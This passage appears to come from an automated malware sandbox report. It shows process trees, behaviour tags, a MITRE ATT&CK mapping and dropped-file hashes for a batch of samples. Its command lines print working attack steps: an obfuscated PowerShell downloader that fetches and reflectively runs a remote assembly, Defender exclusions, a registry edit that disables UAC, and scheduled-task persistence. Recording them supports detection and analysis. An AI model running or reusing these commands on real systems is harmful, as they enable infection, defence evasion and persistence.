C:\Windows\SysWOW64\Flfpabkp.exeC:\Windows\system32\Flfpabkp.exe8⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:624 -
C:\Windows\SysWOW64\Gqdefddb.exeC:\Windows\system32\Gqdefddb.exe9⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3432 -
C:\Windows\SysWOW64\Hjlioj32.exeC:\Windows\system32\Hjlioj32.exe10⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2232 -
C:\Windows\SysWOW64\Hnjbeh32.exeC:\Windows\system32\Hnjbeh32.exe11⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4376 -
C:\Windows\SysWOW64\Hmdhad32.exeC:\Windows\system32\Hmdhad32.exe12⤵PID:4692
-
C:\Windows\SysWOW64\Ifjlcmmj.exeC:\Windows\system32\Ifjlcmmj.exe13⤵PID:4932
-
C:\Windows\SysWOW64\Jfofol32.exeC:\Windows\system32\Jfofol32.exe14⤵PID:1736
-
C:\Windows\SysWOW64\Jgabdlfb.exeC:\Windows\system32\Jgabdlfb.exe15⤵PID:316
-
C:\Windows\SysWOW64\Kgclio32.exeC:\Windows\system32\Kgclio32.exe16⤵PID:4840
-
C:\Windows\SysWOW64\Mjkgjl32.exeC:\Windows\system32\Mjkgjl32.exe17⤵PID:1748
-
C:\Windows\SysWOW64\Nlqmmd32.exeC:\Windows\system32\Nlqmmd32.exe18⤵PID:2060
-
C:\Windows\SysWOW64\Qndkpmkm.exeC:\Windows\system32\Qndkpmkm.exe19⤵PID:2696
-
C:\Windows\SysWOW64\Bqgmfkhg.exeC:\Windows\system32\Bqgmfkhg.exe20⤵PID:3084
-
C:\Windows\SysWOW64\Bgaebe32.exeC:\Windows\system32\Bgaebe32.exe21⤵PID:3228
-
C:\Windows\SysWOW64\Bigkel32.exeC:\Windows\system32\Bigkel32.exe22⤵PID:4300
-
C:\Windows\SysWOW64\Cbdiia32.exeC:\Windows\system32\Cbdiia32.exe23⤵PID:2312
-
C:\Windows\SysWOW64\Dpapaj32.exeC:\Windows\system32\Dpapaj32.exe24⤵PID:1156
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe"C:\Users\Admin\AppData\Local\Temp\90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Nummmeret=Get-Content 'C:\Users\Admin\AppData\Local\Temp\forgrovelse\konstituerendes\Printermanualens.Ear';$Trojanerens=$Nummmeret.SubString(42833,3);.$Trojanerens($Nummmeret) "4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"5⤵PID:1136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1955e7fe3c25216101d012eb0b33f527.exe"C:\Users\Admin\AppData\Local\Temp\1955e7fe3c25216101d012eb0b33f527.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe"C:\Users\Admin\AppData\Local\Temp\a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VCREDI~2.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VCREDI~2.EXE4⤵PID:6996
-
C:\Windows\SysWOW64\msiexec.exemsiexec /i vcredist.msi5⤵
- Event Triggered Execution: Installer Packages
PID:3296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe"C:\Users\Admin\AppData\Local\Temp\be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3392
-
-
C:\Users\Admin\AppData\Local\Temp\bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe"C:\Users\Admin\AppData\Local\Temp\bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3456 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe4⤵
- Adds policy Run key to start application
- Boot or Logon Autostart Execution: Active Setup
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:328 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe5⤵
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"5⤵PID:4476
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"5⤵PID:4828
-
C:\Windows\SysWOW64\install\Svchost.exe"C:\Windows\system32\install\Svchost.exe"6⤵PID:444
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exeC:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe /C4⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:624 -
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gold.exe"C:\Users\Admin\AppData\Local\Temp\gold.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dwn" /tr '"C:\Users\Admin\AppData\Roaming\dwn.exe"' & exit4⤵PID:3516
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "dwn" /tr '"C:\Users\Admin\AppData\Roaming\dwn.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE32E.tmp.bat""4⤵PID:3196
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2660
-
-
C:\Users\Admin\AppData\Roaming\dwn.exe"C:\Users\Admin\AppData\Roaming\dwn.exe"5⤵PID:3084
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "InVOKe-exPReSSION(('6Hc'+'u'+'r'+'l ='+' '+'MRPhttps:'+'//ia'+'6'+'00100.u'+'s.a'+'rc'+'hi'+'v'+'e.'+'or'+'g/24/i'+'tems/d'+'etah-note-v/D'+'et'+'ahNoteV.t'+'x'+'t'+'MRP'+';6Hcbase'+'64Cont'+'ent'+' = (Ne'+'w-Obje'+'ct S'+'ystem.Net.We'+'bC'+'li'+'ent).Down'+'l'+'oad'+'Strin'+'g'+'(6'+'H'+'cu'+'r'+'l'+')'+';6Hcbin'+'aryC'+'ontent = '+'[System.Con'+'vert]::Fro'+'m'+'Bas'+'e64'+'S'+'tr'+'ing(6Hcbase6'+'4Content);6'+'H'+'cassembly'+' = [R'+'efle'+'ctio'+'n.Ass'+'e'+'mbly'+']'+'::L'+'o'+'ad'+'(6Hc'+'bi'+'naryC'+'o'+'ntent);6H'+'ctype'+' ='+' '+'6Hc'+'assemb'+'ly.GetTy'+'pe(M'+'RPR'+'unPE.Ho'+'me'+'M'+'RP'+');6H'+'cmetho'+'d'+' '+'='+' '+'6'+'Hc'+'ty'+'p'+'e.GetM'+'eth'+'od(MR'+'P'+'VAIMRP)'+';6Hc'+'me'+'t'+'hod.Invoke(6H'+'cn'+'u'+'ll, [objec'+'t[]]@(M'+'R'+'Ptxt.'+'ya'+'dnom/ve'+'d.2'+'r.3'+'9b34530'+'2a075b1bc0d4'+'5b'+'63'+'2eb9ee62-bup/'+'/:sp'+'tthMRP , MRPdesat'+'i'+'v'+'ado'+'MRP , M'+'RP'+'desativ'+'ad'+'oMR'+'P , MRPdes'+'ativa'+'doMRP,MRPA'+'ddI'+'nProcess3'+'2MRP'+',M'+'R'+'PMRP))').RePlacE('6Hc',[StRinG][CHAR]36).RePlacE(([CHAR]77+[CHAR]82+[CHAR]80),[StRinG][CHAR]39) )"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\l6E.exe"C:\Users\Admin\AppData\Local\Temp\l6E.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3484 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:924 -
C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"4⤵PID:1772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"5⤵PID:6420
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵PID:6472
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tt.exe"C:\Users\Admin\AppData\Local\Temp\tt.exe"3⤵
- Executes dropped EXE
PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\sloppyCatsV1.exe"C:\Users\Admin\AppData\Local\Temp\sloppyCatsV1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\Wire-transaction073921.exe"C:\Users\Admin\AppData\Local\Temp\Wire-transaction073921.exe"3⤵
- Executes dropped EXE
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\Payload.cmd.exe"C:\Users\Admin\AppData\Local\Temp\Payload.cmd.exe"4⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\30.dllC:\Users\Admin\AppData\Local\Temp\30.dll5⤵PID:5072
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /query /TN 30.dll6⤵PID:4572
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "30.dll" /TR "C:\Users\Admin\AppData\Local\Temp\30.dll \"\30.dll\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:4752
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /query /TN 30.dll6⤵PID:4156
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\Py017394- 01.htm4⤵PID:4680
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4680 CREDAT:275457 /prefetch:25⤵PID:4900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:7104
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\GFoZjxH.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:7148
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GFoZjxH" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1027.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3588
-
-
C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"4⤵PID:992
-
-
C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"4⤵PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3852 -
C:\Users\Admin\AppData\Local\Temp\is-FUA7D.tmp\is-PFFTE.tmp"C:\Users\Admin\AppData\Local\Temp\is-FUA7D.tmp\is-PFFTE.tmp" /SL4 $6019C C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe 2516569 512004⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4080 -
C:\Program Files (x86)\STV\stvcn.exe"C:\Program Files (x86)\STV\stvcn.exe" /Q5⤵PID:3608
-
-
C:\Program Files (x86)\STV\stvserver.exe"C:\Program Files (x86)\STV\stvserver.exe"5⤵PID:4532
-
-
C:\Program Files (x86)\STV\STV.exe"C:\Program Files (x86)\STV\STV.exe"5⤵PID:4040
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s C:\Windows\PowerPlayer.dll6⤵PID:5156
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\OGGY.exe"C:\Users\Admin\AppData\Local\Temp\OGGY.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit4⤵PID:4388
-
C:\Windows\system32\wusa.exewusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\5⤵PID:1480
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\888.vbs"4⤵PID:2512
-
C:\Windows\System32\migwiz\migwiz.exe"C:\Windows\System32\migwiz\migwiz.exe" C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵PID:2580
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵PID:3108
-
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- Modifies registry key
PID:3224
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lol.exe"C:\Users\Admin\AppData\Local\Temp\lol.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:3952 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\lol.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5092
-
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1020
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-42476039414976241875329430171889409600-2026697860-1633785140-1373501402-1457583742"1⤵PID:2456
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "63396603416035886442529931041329192164-1107958084-791679324-153126887193286288"1⤵PID:1332
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "21130897672034579650-1307221766-206557952-1697384331994312172058154270432347091"1⤵PID:1036
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2012373451-1774699112-5482010731713240353-523726442-1311428411749629344-12287364"1⤵PID:1504
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3552
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2624
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (2)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (4)
  - Active Setup (1)
  - Registry Run Keys / Startup Folder (3)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Installer Packages (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (4)
  - Active Setup (1)
  - Registry Run Keys / Startup Folder (3)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Installer Packages (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (4)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (3)
- Modify Registry (10)
- Obfuscated Files or Information (1)
  - Command Obfuscation (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- System Binary Proxy Execution (1)
  - Msiexec (1)
Downloads
-
Filesize
1.2MB
MD5 8b116072a75efa3da377ba2bc0900091
SHA1 2bd8b6e2d87b59c31cdf4e0216320b35fd7958e1
SHA256 b807d80e134022e64a590feace5f2b5e8bc21774f835a1208562d483c2eeef36
SHA512 71d6c41a8870759793ad2e429cc5c0b8cd71d93ca2c53aa8fdb85f9d89e328ed37fae22653bcef54a8f00b8e54128f929432f33388bc938bfe6d58cca0211f19
-
Filesize
777KB
MD5 669abe7232a5d0490168e67b3e9215f3
SHA1 6d206af6c7ab2da96fb73895e6849f5e9a7857f9
SHA256 cc856d721b3b378b950d00fd54a54f9baad14b93f41137c82ed16c04517420a0
SHA512 b814f99c5d74a251d3d327090137d6470adaa5c3e532e92e7e872fc1ab23de62fd26e3d5c53ec74c5cca3fd349fe29fa657bfd5697811c02cbd8fe8c2d5c8f9d
-
Filesize
457KB
MD5 6ee70ce9eaaed499fc000c985ae65e0a
SHA1 4fb232b74822fccd40b974fc0f8c83e62ea86ba4
SHA256 6bdbfd7f267e35c2c95506afb8ff9569afed9029a48d2280adfba34b6a516296
SHA512 fcefe9cb17a3b6dbfae8c134cdf1889fc592f2b146905b322238b55e34e053c5db25df83ede0a86dabc2c92fbf574896f9056782ee2aba6aca23018318e80be8
-
Filesize
387KB
MD5572036d5463b29b76433e14301d7c68a
SHA1b2d7a92b5c0b47ad5f8b9c54a55547f0c12e1399
SHA256f5776f97afa32aebf2fac763f3e796a6b4c405c7545f48653ac8a1b2b8c3249c
SHA51238cf1a764b2c650fa8a282dd921e5b0fd5ebb48980893d0edd0d8461c0748b24512f5e19fdbb939e56867c9caa94ce290286814714308548e06d60713703c9ae
-
Filesize
6KB
MD5b7b3f7e3e69425454ff05a616a726f26
SHA15239e853802b443cbc9b3752809cd2d84358c7c8
SHA256f1264331f55bf0ae1b3ae4b54d3b64e21b844a108666e006d25a59299c33b749
SHA5127512e0b4fc1d0898cc6c33bb0dcdc2730d8bfdf8a714b27f1e532c064c543971838263da6b7727e82276946acd3878e68d4b5637ad96dac17062255f622b4c0f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD57c695a90f7d89458e5ca9c26847f7a4a
SHA1b1178d9e6952a440a4e1b63602fef480583919cd
SHA2563e1b6d1d771a2cec815988b0cb2fb33721f2c0a61730c59823b30e7835f3437a
SHA512f95c888e8bf852f9334a8d52cd39c678be4fa1ace930730fd52187bf590b09f82a72958fbdf4ec733cf8d85812823f57fe02a3ade8e90daf48abfb96832f0090
-
C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Filesize487KB
MD5d9ade81857f1e31c667c61fc45de2a31
SHA12765c74e8c4f4d18ca1785123bf8dab1cfcf52dc
SHA256016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0
SHA51215cfe9f990a95b89790097ba4d888b315abe4c2fc9aad182a9c9470b17763c84e850c508c70cfcee9824bcde05542856d7b9a129ec4e4d9d1c9bf19ef3b5dac0
-
Filesize
830KB
MD51955e7fe3c25216101d012eb0b33f527
SHA1f8a184b3b5a5cfa0f3c7d46e519fee24fd91d5c7
SHA25655194a6530652599dfc4af96f87f39575ddd9f7f30c912cd59240dd26373940b
SHA5125c4a65e898f89bdb83b66aa15205200c359a64994b939eb5ca8fe3b1d94eb67a3174a784616f984e4a21663680a496f7a50b00be35ad12c6d38df10cabd65233
-
Filesize
47KB
MD59dda4db9e90ff039ad5a58785b9d626d
SHA1507730d87b32541886ec1dd77f3459fa7bf1e973
SHA256fc31b205d5e4f32fa0c71c8f72ee06b92a28bd8690f71ab8f94ff401af2228fe
SHA5124cfecaaccd0f8f9e31690ff80cca83edc962e73861043fffded1a3847201455d5adca7c5ef3866c65e6e516205e67b2f31c8149aad5be1065c1eb586b013f86a
-
C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
Filesize159KB
MD5d69165cfd5e6da160c2a60bad8a9daff
SHA1466caab305aace6234238a45b5dad9d6c0f182ff
SHA2565fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f
SHA5122f55cc32d9355bc6e6e814a7fee6bf45051eafab56ec3935598483164278ba4cdbf560a1c2491fff54f7dbe67fa9c718893e4d19047b0846cc3e1fd6f329b002
-
Filesize
8B
MD5140150e8159952c0c8bca09061a24006
SHA14ab4b2c0ed487d89981b7a26bf46a6b4a539c2da
SHA256f10c74800c5054169dea682e17723137d5bd0de9727a802484daca27e6af6c94
SHA51248ddf6417872cc1aba35a350bc13a46775799eeab4e94c4f9f1aa960cc6b16113d3ce93e51a56ef24c102a790735ae7cca1d33158da120c284236fb6d2f06cee
-
Filesize
8B
MD5b80a98727c5c915f442b1cfd846e35f9
SHA1f44e8b0851f533b1f9f2cd4c64dad60cf5c29c15
SHA2569b5cc307b5fe8839cd5cca371544d96d37b5cc66b2e821348d6663da34ed422e
SHA512f30b5c3bd098abbb7f2017bfc642a3050e5c86a4684761870194204bc96d2554f4df6f5f7f104ad760d763bd21543e047aa28d5aab0f1dd80258139e686bbf66
-
Filesize
8B
MD52bc675b6bab349c5b03f9d710f5abad8
SHA1dbbce068e8dfe83fa12df9f9518e8b123cb7d319
SHA256d101a1d358cbfc2cae98f09f01143fa9436e4b97f2cfec39ec73f16d24067900
SHA5120b4e5b30f16cea0532a667b1df92e08d68e4d0ae80ef368654097550804c6d2f7e378cefad1b8fb4eda4ae0499fc2a9d866c4361335ed18f189be37da75e113d
-
Filesize
8B
MD58efc40d367fa1b31353f16463f7d3bf4
SHA1c89f596ce2443cdfdd7288c39335d220d146b2ca
SHA256a07eacdd7c3a0e4e93824c54903d4115232f444fbe41a14ac3c450f3c1ff1bb1
SHA512a2b7c62af0bd282b82cc187412b3e58aa25216dc5ac7564ce4b4bb3075922437b319aaa3437d32ef105b7fa3252eb3156ec2bff6f5071774ff063a2bc1f7815e
-
Filesize
8B
MD5a03c9f64c43d66cc0df2bb62e4f869be
SHA199a89e10077864645cbec8c2c684f21415977cc2
SHA256f0a44ce8a71d11334f6cb32f8ab19bd8225cf430eff906e726fa598c021419fd
SHA512b9ce8044a17a781cbe606cdf165bfb85c38354eb2acdd3e158ffd54f533cb43f2ba080dbf96493804470fc223ffabdb50298535a96d7cb0528983f11ab953fa8
-
Filesize
8B
MD545116fce1a0beac67f44f41b28e7e3d8
SHA165dcafaec584cf29ee095072bf2b3bff56530bf4
SHA256e412c6f5777bc60169b841b987bb22fa6818a84595a13ffa59ba2db1c1b00f55
SHA512c6bda103c38ba299efe868766860311d3a7ea219c115c252e9477689e225e80f893bfd006f91c2851e5f367793f5df77936faa608f26c9691737176d2889409a
-
Filesize
8B
MD5fb00fe962c07959c85aa66201833fcaf
SHA10cace291603d43d85fd527709cf8c7d605fe2c66
SHA2561a62e7e63d03fe6fe6ad749212a6e8330b06d8dac0b9a54d613b6240333d3391
SHA512b012df626152b00d1699c6a6adde62c3f73eab802db42004dd1420ff4b9731b969cc694ca9eaf9c0174729930d9ffc99d29216fbc9a0386a610ac706454730d5
-
Filesize
8B
MD5bfc11ea044ac564a022336745dfb71a2
SHA15426a4f4a7b9fec76ccaf4c8171d25d1c7896406
SHA2560bd77a697e3767ea1f6b33aba30a9e76c9a1dc2ac389b4b51462c3b15174d102
SHA5127b93e0e6261bec2afebec5b9c6713e81ece09ac2899aa1632ff3637d2346178f0208753926561bb9e5457943564707a61cdf9aa6b9b1016af27b0a1b7ccf9ea8
-
Filesize
8B
MD5318aed1a0d0894ffc04b63a263f1d79d
SHA1cac67a16eadade583ba5fa063a2fcb62b6532156
SHA256029564d86edbd17aac1431df451b954cd4e827b321420bbba89747c2e5bed5c1
SHA512197de9f4b3c57fcce64d5600189ebd89a707e287fbe1a7465a53fd05a481bcf633108df13e3806c9efd153ddad7cce5cd662389d5e23a0956164fb1adff7be82
-
Filesize
8B
MD537f130a1d47d11ed1a61ec8edcc59f56
SHA1f001613a120e01df4d4d5e8a0d382cd19334e2e4
